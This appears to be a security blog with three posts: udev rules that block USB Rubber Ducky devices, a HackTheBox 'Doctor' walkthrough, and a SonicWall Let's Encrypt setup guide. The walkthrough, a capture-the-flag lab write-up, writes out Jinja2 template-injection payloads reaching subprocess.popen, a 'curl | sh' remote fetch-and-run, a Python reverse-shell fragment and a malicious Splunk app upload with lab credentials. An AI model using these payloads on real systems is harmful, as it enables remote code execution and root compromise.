Blocking USB Rubber Ducky Attacks

And other badusb mitigation with udev rules and Group Policy

I recently had the pleasure and good fortune to work with a small group of my peers in exploring the HAK5 USB Rubber Ducky as a part of the RITSEC mentorship group. We all approached the project from different angles, and as a result we learned a lot about how to perform attacks, different attacks that were possible, and some possible mitigations. Please check out Olivia Gallucci’s blog (January 29, 2021: RITSEC Hak5 Rubber Ducky Research Presentation) if you would like to see what the group worked on as a whole.

This post if going to focus mainly on my own research as part of the team and what I discovered in regard to blocking the USB Rubber Ducky. The method can easily be expanded to mitigate against other badusb devices as well. I will start by talking about the USB protocol itself and how that lead me to the methods I came up with. If you would like to skip the background information, scroll down a bit to find the actual blocking methods.

The USB Protocol

The USB protocol is essentially the agreed upon language that USB devices and hosts use to communicate and set up a connection. This is what allows for new devices to be connected and accurately recognized for what they are. At a high level, when a device is plugged in to a host the host will see that there is something now connected and query the new device for its USB descriptors. Now there are a lot of USB descriptors defined within the protocol, but we do not need to go into all of them to get a general understanding of what takes place and how the USB Rubber ducky abuses the process.

There are three main descriptors that we will want to become familiar with: idProduct, idVendor, and bInterfaceClass. As you might expect, the idProduct and idVendor descriptors are used to identify the manufacturer and specific device that has been connected. This is not used by the host beyond labeling purposes in most cases. bInterfaceClass is used to identify what type of device was just plugged in. There are many, and a complete list can be found on the official USB Implementors Forum website, but for now we are concerned with only two: 0x08 which defines a device as USB mass storage, and 0x03 which defines a device as a Human Interface Device (HID).

Usually when a USB device is plugged in, it will correctly identify itself as what it really is. If it does not do so, the device will not work as intended. For example, if a USB storage device sends a bInterfaceClass descriptor which identifies itself as a printer, it will not show up as a USB drive that users can save files to. Because most manufacturers want to make devices that actually work, it is in their best interest to make sure their devices identify themselves correctly. A typical process for a USB drive can be seen in the images below:

The device is plugged in, and the host makes a request for the descriptors of that device.

The device responds, and here we can see the idVendor and idProduct descriptors being exchanged. The host then requests the device’s configuration descriptors, which will be used to define the capabilities of the device.

There is a lot of information exchanged to ensure that the device gets everything it needs from the host, but we are specifically interested in the highlighted line. This is a well behaved USB drive, and it identifies itself correctly using bInterfaceClass code 0x08. The host now knows that this is a mass storage device, and it can handle mounting and file transfers accordingly.

The USB Rubber Ducky takes advantage of the trust that the host has for the descriptors that are sent by the USB device. As mentioned before, the only thing that prevents a device from misrepresenting itself is the manufacturers desire to produce working devices, and in the case of the Rubber Ducky the manufacturer intentionally programmed the device to misidentify itself as an HID.

The capture shown above is from one of the ducky devices I used to do my testing. We can see that the bInterfaceClass code is set to 0x03, which will cause the host to see this as an HID. In this case a keyboard. So despite the fact that what the ducky actually contains is a micro-SD card, the host will see keyboard input and treat it as if it were any other keyboard. Now the attacker can achieve anything that would be possible while actually using a keyboard, but at much greater speeds than humanly possible. This can present an issue for organizations and individuals who are security conscious. It has long been known that locking down USB mass storage devices can improve the security of a system, but we can’t very well go around blocking keyboards. That would prevent legitimate users from doing any work and create an administrative overhead nightmare anytime someone needed a keyboard replacement.

So what can we do about that? The answer is fairly straight forward: blacklist rather than whitelist. There is a significantly smaller number of devices that can be used in these types of attacks than there are actual USB keyboards for legitimate use. If we can block just one specific device, we can prevent a large number of attacks. Luckily, the USB protocol requires the exchange of identification descriptors before anything else, so we have an opportunity to lock out the bad USBs.

Blocking USB with udev rules

On Linux systems using kernel 2.6 or later, we have a device manager called udev which will allow us to create specific rules to handle how certain USB devices are treated and configured when they are connected to the host. In many cases this will be used for tasks such as adding a label to a certain device, or perhaps mounting a drive into a specific mount point.

udev can dynamically apply the configuration specified in the rules that are created, which makes it the perfect tool for what we want to achieve. Particularly because this dynamic configuration can be done based on the idVendor and idProduct USB descriptors that were discussed earlier. This allows us to target only the devices that we want to target without impacting anything else.

I will not be going far into everything that udev can do, nor how to create new custom rules. If you are interested in learning more about that topic, I recommend starting at the Debian Wiki article about udev.

All that needs to be done is the creation of a new udev rule. This is achieved by creating a new file in the /etc/udev/rules.d directory (requires root privileges) and saving the desired configuration into that file. We only need one line to block a device:

#Amtel chip based HAK.5 USB Rubber Ducky should be disabled
SUBSYSTEM=="usb", ATTRS{idVendor}=="03eb", ATTRS{idProduct}=="2401", ATTR{authorized}="0"

A quick rundown of what this will do: if a device is connected to the “usb” subsystem with idVendor matching “03eb” and idProduct matching “2401”, the “authorized” attribute will be set to zero. Devices are given an authorized value of one by default, so by making this change we remove authorization and effectively disable the device.

In my testing and research, I found that all of the USB Rubber Duckies that I had access to actually share a common Vendor and Product ID. If you have a device that you want to block and you do not know the ID descriptors, you can find them fairly easily using the lsusb command. In this way you could expand the rule shown above to block any other devices you want to.

Format is Vendor:Product

I created a small script to automate the process of adding the rule and restarting udev to activate it which you can download from my Github:

Blocking USB with Group Policy

More details coming soon! I am still working on building my local domain so I can get proper screenshots for the content. In the meantime, here is the documentation that kicked off the Windows side of this project:

HackTheBox – Doctor – Walkthrough

Released about three months before the time of writing, Doctor is a relatively new machine released by egotisticalSW on HackTheBox. It is an immensely fun and informative challenge, with some very interesting techniques required to reach the end. It is rated as ‘easy’ though the user ratings tend more towards medium which feels more accurate to be honest. I highly recommend that you give it a try on your own before reading this article, I am sure you will learn a lot and enjoy it thoroughly.


This challenge begins as most good challenges do: enumeration. Pulling out the trusty tool called nmap, we get our first look at what services are running on the machine.

NMAP scan results

There are three open ports, with SSH running on 22, and web services running on both 80 and 8089. We will start with exploring the web service on port 80.

Port 80 website capture

It looks like a fairly stock website. No login forms to be found, and nothing to interact with. Gobuster didn’t find anything interesting either, only returning the directories containing images, css, etc. Fortunately the web service on port 8089 has more going on.

Port 8089 web site capture

The RPC link is not useful. Per splunk documentation it is only in place for backward compatability, but does not actually provide functionality anymore.

Static is a dead link, only returning a 404.

Services and ServicesNS are more interesting, presenting an HTTP basic Authentication prompt for the realm ‘/splunk’

Splunk HTTP Basic Auth

At this point it seems we have reached somewhat of a dead end. The site on port 80 isn’t interesting, and we are locked out of splunk. So, what next?

Turns out, something on the doctors website was overlooked:

Email domain

So far we have been using the IP address to access the web server, which means that when we make the http GET request for this page the host field of the http header contains that IP.

HTTP Request IP Host Header

If the web server is configured with a vhost for the doctors.htb domain, we might find some new material.

HTTP Request Domain Host Header

This can be achieved either through modifying your local hosts file, or in my case adding an entry into my local DNS server. Once that was in place, we can browse to http://doctors.htb, rather than

Sure enough, there is another page for us to work with! And this one looks like it will be much more promising.

Secure Messaging Login Page

Naturally, the first thing that I tried was some common weak credentials. I made an assumption that there would likely be an account called admin, so using ‘admin@doctors.htb’ as the email I tried some passwords like admin, administrator, adminadmin, password, password123, etc.

Sometimes you get really lucky and that will be all it takes, but there was no such luck.

Failed Login

Abandoning that tactic, and not wanting to resort to brute force, I started to explore some more options.

Immediately apparent on the page are the ‘Forgot Password?’ And ‘Sign Up Now’ links, but before following through on those I decided to take a glance at the page source. Sometimes there is interesting JavaScript or perhaps a comment that shouldn’t have been allowed into production.

Comments revealing too much

So what do we have at /archive?

Nothing here?

Huh… well that is certainly beta…

Nothing much in the source either. This really does look like nothing has been implemented here yet.

Nothing in the source either

Let’s check out the reset password functionality. Maybe we can reset admin’s password to something we know.

No resets today

That’s disappointing. Onto registration then!

User registration

Throwing together some simple account details, we are in fact able to register an account.

When we log in, we are greeted with an interesting message:

tick tock

Okay, so we have twenty minutes to explore before we have to re-register. A little annoying, but workable.

Clicking around through the various menus and pages does not reveal much. There is a basic post from an admin account, but no real useful information. Are we stuck again?

Of course not! I’ll cut out some of the details for the sake of time, but there are many options to explore. Given that we now have the ability to make new posts, the first thing I started to look into was whether or not there was input sanitation. Turns out there was, I was not able to get any JS or other type of code execution through the new post functions.

I then turned to possible SQL injection on the login page. Thanks to the post that was found from the admin user, we know that there is at least one other user account that we may be able to get into. Unfortunately, SQLi proved fruitless as well. It was at this point that I took a step back, made a sandwich, and did the dishes. It can really help to step away from the problem for a bit, and I had been trying different ideas for several hours by now.

It was as I was putting some dishes away that I realized that I had not actually confirmed what type of web server I was working with. Knowing that piece of information can really help to guide what tactics we explore.

I came back to the Secure Message Service and opened up the firefox dev tools once more. Inspecting the HTTP headers for the server response, I saw this:

Back-end server type

This is good! Werkzeug is commonly used by python web frameworks such as Django or Flask, so we have a direction for investigation. From some prior experience I knew that these python web frameworks would make use of templates to generate HTML content, and that in some cases these templates are not securely written. These insecurities can lead to Server Side Template Injection, or SSTi. If you haven’t heard of that before, I highly recommend taking an hour or so to read a little about it. It can be a very powerful method for information exposure and in some cases even remote code execution.

Now we just need to figure out if there is anything we can inject, and we need to get information about what template engine is being used. There are several different template engines, with jinja2 being very common in Django and Flask deployments. That said, it could also be Twig or another alternative. There are some simple tests that can be used to determine which template engine is being used. I like using this one when I know the back-end is python:

{{ 7*'7' }}

This one is nice because there will be different output depending on which template engine is being used. If jinja2 is being used, the output will be 7777777, whereas Twig will interpret that as a math operation and output 49. Either way, you will see that there is an opening for template injection, and you will know which template engine to write code for.

There are many more, and I highly recommend taking a look at PayloadsAllTheThings SSTi page for more information about the different tests that can be done.

Once again I am drawn to two parts of the message system: the login and the new post method. The login page doesn’t give us output containing the input we provided, so starting with the new post method seems like a good idea.

SSTi Tests

Unfortunately, the results are not promising. The input is likely being escaped, so that the template format is not being recognized as code to be executed. Once again, I spent quite some time trying out new things and poking around. It was getting towards the end of the day when I randomly decided to look at the archive page once more.

The page itself was still blank, but the source code showed something interesting:


It had worked!! The title of the post is injectable!

And based on the output it would appear that the template engine is in fact jinja2. Finally some progress!

Now there are a few routes that we can go from here. As mentioned earlier, it is possible to expose data from the server through LFI, but what I really want to try for is a shell. This is going to require some investigation, because not all python environments are the same. Some will have function available that others may not, so we will need to get the lay of the land here. To do this, we will take advantage of the Python Method Resolution Order, or MRO. I won’t be explaining what that is in this post, but if you want to read more about it there is some very good information here:

Now, let’s begin to craft our code. The first thing we want to go is to see what functions are available to us. I will start with the most basic steps and build up from there.

{{ ''.__class__.__mro__ }}

This is an empty string (two single quotes), and we are calling the __mro__ attribute of the class which the string type belongs to.

Refreshing the archive page source, we see the following:

We used the string (str) class to obtain this information, so we will now navigate through the method heirarchy into the object class. Python is zero indexed, so we can provide the index of 1 to reach that second element in the dict. We then need to view the subclasses of ‘object’.

{{ ''.__class__.__mro__[1].__subclasses__() }}

The output of this injection is really quite long. It contains all of the methods which are subclasses of the object class, and as you can imagine there are many. I specifically want to find popen(), as it will allow me to execute commands directly on the server itself. So a quick Ctrl+F for popen reveals:

We have it! Not on its own, but from within the subprocess module. That is fine though. Now we just need to find the index of this method so we can call it. This part is a bit of trial and error using slicing. To start with, I used a starting index of 200.

{{ ''.__class__.__mro__[1].__subclasses__()[200:] }}

This will cut out the first 200 elements in the dict and only show what comes after. Do another Ctrl+F to see if popen is still present. If it is, we need to increase the starting index. If it is not in the output, we sliced it out and need to use a smaller index. Going through a few iterations of this I was able to find that the index for subprocess.popen in this environment was 407. It will likely be different in other environments so be patient and just work through it.

Now that the tedious work of finding that index is complete, we can start executing some code. To start with, just to verify that this was actually going to get results, I ran the ‘id’ command:

{{ ''.__class__.__mro__[1].__subclasses__()[407]('id', shell=True, stdout=-1).communicate() }}

We get output as if we were at a shell directly. On top of that, we now know that code will be executed as a user called web. Based on the uid, this is a standard user account, not a service account. Now onto obtaining a more interactive shell. I opted to use a curl shell, because other methods were proving difficult to type out while maintaining the proper quote encapsulation. This method is pretty straight forward. It involves using curl to pipe commands from a remote web server through a local shell instance. I used a modified version of this reverse shell by Luke Childs: My target did not have public internet access, so I hosted the code on my attacking machine. That allowed me to make a curl request from the target using popen which would grab the code from the attacking machine, and run it through sh. With a netcat listener open, I ran this code:

{{ ''.__class__.__mro__[1].__subclasses__()[407]('curl | sh', shell=True, stdout=-1).communicate() }}

Refreshing the archive source once more, it hangs. This is always a good sign when executing a remote shell this way. I checked on netcat and was greeted by one of our favorite sights:


Some basic shell stabilization and we are off to the races!

Privilege Escalation – User

Now that we have a shell, it is time to get the lay of the land. Looking around, it becomes clear that we are not the correct user. Currently we have access as web, however only shaun has access to the user.txt file which contains the flag we need.

notice the permissions on user.txt

One of the first things I do when I have access to a new system is run an enumeration script. There are a number of great scripts out there, but I tend to go with LinEnum ( ) or LinPEAS ( ) in most cases. I used LinPEAS this time, for no reason other than I decided to on a whim.

LinPEAS provides TONS of great information. More than we can properly go over here, but I would recommend running it on your own system to get a feel for what it can reveal.

I spend several minutes reading through the output of the script. I have found that it is usually beneficial to take the time to read through all the output right away rather than jumping to the first possible escalation technique you see. Sometimes there are other, easier ways further down. That policy served me well in this case. Down towards the bottom of the script output, I found this little nugget of information:

betrayed by the logs

Do you see it? The first apache2 log entry.

It looks like someone accidentally entered a password where the email is supposed to go in the password reset form. Maybe we can take advantage of that, after all, password reuse is very common…

And just like that, we have access to the user account we need!

Next, we root.

Privilege Escalation – Root

First things first, check the obvious:

no sudo for you

No dice. We already have the LinPEAS output from earlier, and looking through it again does not reveal any clear paths to root. No cronjobs or obviously misconfigured permissions. No strange SUID files or capabilities.

One item did catch my eye after a few more minutes of reviewing the data:

splunk process running as root

Splunk, which we explored briefly in the beginning, is running as root. And we now have credentials, so we should be able to get past the http authentication that stopped us before. Perhaps we can leverage this to run our own code, using splunk, as root…

Navigating back to the splunk page, we are indeed able to login using shaun’s credentials. Once authenticated, there are many more options than were previously available:

Now, we could just start clicking around (and I admit that I did), but really we need some documentation on what these all do. Some light googling reveals that these links are in fact Splunk’s REST API ( ). The documentation revealed some interesting functionality, specifically in /apps/local. It would appear that a POST request to that endpoint would allow us to install a new app, as long as the user account we are logged in as has appropriate permissions.

According to this reference on the apps/local endpoint:, we need install_apps AND edit_local_apps, OR admin_all_objects permissions. We can find our permissions using the /admin/users enpoint, which confirmed that we do indeed have the permissions necessary:

Now we need to create an app the splunk can use, so we can execute code.

The document at provides some details on what is needed. Essentially, we create a directory for our new app, and create the bin and default directories within that. Our code goes in ./bin, and there is some information that splunk needs in ./default. The file tree will look like this:

    \__ /bin
    \__ /default

For the code itself, we will just use the common python reverse shell. Nothing too special:

import sys,socket,os,pty
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]

The inputs.conf file in the /default directory is what splunk will use to keep track of the process that is spawned from the app. It helps to prevent duplicate processes, and will tell splunk how often to restart the process if it dies.

disabled = 0
interval = 10
sourcetype = HTB

Finally, we need to wrap all these files and folders up into an archive. Splunk can use .tar, .tgz, and .spl files to install new apps. We can use the following to archive this as needed:

tar –cfvz new_splunk_app.tar.gz ./new_splunk_app

Lastly, we need to actually upload the app that we just created. This can be done using curl to create the post request. Reading through the documentation there are examples of how the POST request should be formatted, and the endpoint reference guide indicates which flags are required. ( )

The end result will look like this:

curl -k -X POST -u shaun:Guitar123 https://doctors.htb:8089/services/apps/local \
-d filename=True \
-d name= \
-d visible=True

Before we run the command, we need to start up a netcat session listening on the port we specified in the python reverse shell. With that in place, we can execute.

We get some good XML output indicating that the command was accepted by splunk!

If we take a look at the apps/local endpoint now, we can find the app that we just installed.

The name will be different depending on what you called your files.

Now, for the moment we have all been waiting for…


Thank you for reading my walk through! I hope that you were able to learn some new techniques and get some insight into the path that I followed while attacking this machine. Special thanks to egotisticalSW for creating this challenge, and to HackTheBox for providing the platform.

I’ll see you for the next one. Happy Hacking!

Securing SonicWall Management and SSL-VPN with Let’s Encrypt Certificates

Let’s Encrypt has done a beautiful thing. They have made security certificates for use with SSL/TLS accessible to everyone, for FREE. Truly, truly awesome. They have some very convenient integration with many types of server that makes it not only convenient, but downright easy to obtain and use the certificates as well.

Unfortunately, SonicWall’s UTM firewalls do not make use of the various options for integration, and for those of us that crave proper security this can be a bit of a let down. The good news is, with a little extra legwork, we can use Let’s Encrypt to secure our communications for both web management, and the SSL-VPN.

There are a few things that need to be in place in order to achieve this:
1) We need a valid public domain
2) We need a DNS ‘A’ record that resolves to the public IP address of the SonicWall
3) We need the ability to add TXT records to our public DNS records
4)We need administrative access to the SonicWall
5) We need access to a Unix or Unix-like workstation, server, or similar device and permissions to use sudo to elevate privileges (please don’t log in as root, that’s not good practice)

I am not going to go into the process of obtaining a domain nor how to change DNS records, there are plenty of great tutorials out there already. Instead, we will focus solely on what we need to do for the SonicWall and Let’s Encrypt. This has been tested on firmware versions and up, most recently on That said, I am sure that this same process will work on Gen 5 units that are using the 5.9.x.x ( it had better be, or else you need to update!) line of firmware, but the menu’s will look different.

Enough prelude, let’s encrypt! (Sorry, that was terrible)

The first thing we need to do is generate a Certificate Signing Request (CSR) on the SonicWall. To do so, log in and navigate to Manage > Appliance > Certificates. At the bottom of the list of default trusted certificates, you will find the New Signing Request button. Hit that and you are presented with the CSR form.

SonicWall Certificate Signing Request form

Get that all filled out, and make sure that the common name you enter matches the domain name you have configured to resolve to your SonicWall’s WAN IP. I strongly recommend that you do not use a Signature Algorithm less than SHA256, and the Subject Key Size/Curve should be no smaller than 2048 bits. Once you are ready, click generate at the bottom of the window. You will see a new entry at the top of the trusted certificate list. It can take a moment to generate the key (especially if you went bigger than 2048) so readjust your hat and then hit refresh in your browser.

You will know it is ready to go when the “Type” column says “Pending Request.” Folow the row to the far right of the page and click the download icon to download the .p10 file we will use with Let’s Encrypt to get this request signed. Click “Export” on the pop-up, and save this file somewhere secure.

New entry created by generating the certificate signing request.

That is all for that SonicWall at this point, now we need to get this certificate signed and official. To do that, we will be using certbot, an script published by Let’s Encrypt that will allow us to submit the CSR for signing. I chose to do this on Ubuntu 18.04, but you can use your Unix or Unix-like system of choice. Make sure you can get to the .p10 file that was created in the last steps.

To install certbot onto Ubuntu, run the following:

sudo apt install certbot -y

An issue that many run into when trying this process is that the default way certbot wants to verify ownership of the domain and server is by either:
1) starting up a standalone webserver that it can install the certificate to
2) placing files into the common webroot directory for authentication.
Following that, certbot wants to be entirely too helpful, and will actually try to install and configure the certificate for use on the server you are running certbot on. This is a problem, seeing as the SonicWall can do none of these things.

Never fear, I read the certbot manual so you don’t need to.

We are going to run certbot in ‘certonly’ mode, which bypasses the attempted installation. In addition to that, we are going to use ACME validation through a DNS TXT record, rather than using a web server. Lastly, we already have a certificate signing request, so we can tell certbot to use it rather than generating a new one on the Ubuntu machine we are using. The command will look like this:

sudo certbot certonly --manual --preferred-challenges dns --csr [PATH TO YOUR .P10]

Hit enter and we are off! The –manual means that this will run in interactive mode, so there are a few things that will need to be filled in. Provide an email address that will be notified when certificate renewal is coming up, and agree to the terms of service.

There are a few questions that follow, answer them according to your preferences. After those questions, we are presented with the name of the TXT record we need to deploy, as well as the hash we will insert in that TXT record for verification. Create the TXT record and give it a few moments to propagate. There are a few good DNS propagation checkers available, try one of those and just wait until most of the major servers reflect the change.

As long as you waited long enough for DNS propagation, you should see the success message shortly.

Take note of the expiration date, Let’s Encrypt certificates are not very long lived. It is recommended to have a reminder of some sort to renew the certificate a week or two before it actually expires, so you don’t encounter a lapse in availability. Unfortunately, as of writing this, there is no way to get the certificate renewed on a completely automated basis, mostly because I don’t have an automated way to generate a new CSR on the SonicWall nor a way to automatically upload the signed certificate. Still, this was free…

Anyway, we still need to upload this signed certificate to the SonicWall so we can start using it. Take the xxxx_cert.pem file that was generated, as well as the xxxx_chain.pem files that go with it. Log back into the SonicWall (you did log out earlier, right? I mean, that is good security practice after all… 😉 ) and click on the icon that looks like a server with a green arrow; it will be on the far right, next to the download button.

You will be prompted to select the .pem file that was generated by certbot. Click browse to locate the file, and then hit upload.

We are nearly done! You may notice that in the “Validated” column, this certificate is listed as not validated.

This is because the Let’s Encrypt Certificate Authority Root Certificates are not trusted by the SonicWall UTM by default. We will need to upload the requisite certificates to complete the chain of trust. That is where those xxxx_chain.pem files come in. Scroll on down to the bottom of the page and click the import button. Select thr radio button for uploading a CA Certificate, and browse to the xxxx_chain.pem files.

Once you have them all uploaded, you will notice that the Validated status now says “Yes”. If for some reason you are unable to upload those files, or maybe something happened and they were never generated, you can obtain them from the following locations:

Save those files as .pem and proceed with the import as detailed above.

Congratulations! You have successfully obtained and uploaded a valid certificate for your SonicWall, from Let’s Encrypt, for the best price possible: free. Now you can use the certificate to secure WAN management and the SSL-VPN service, or really any other place you may want to use it.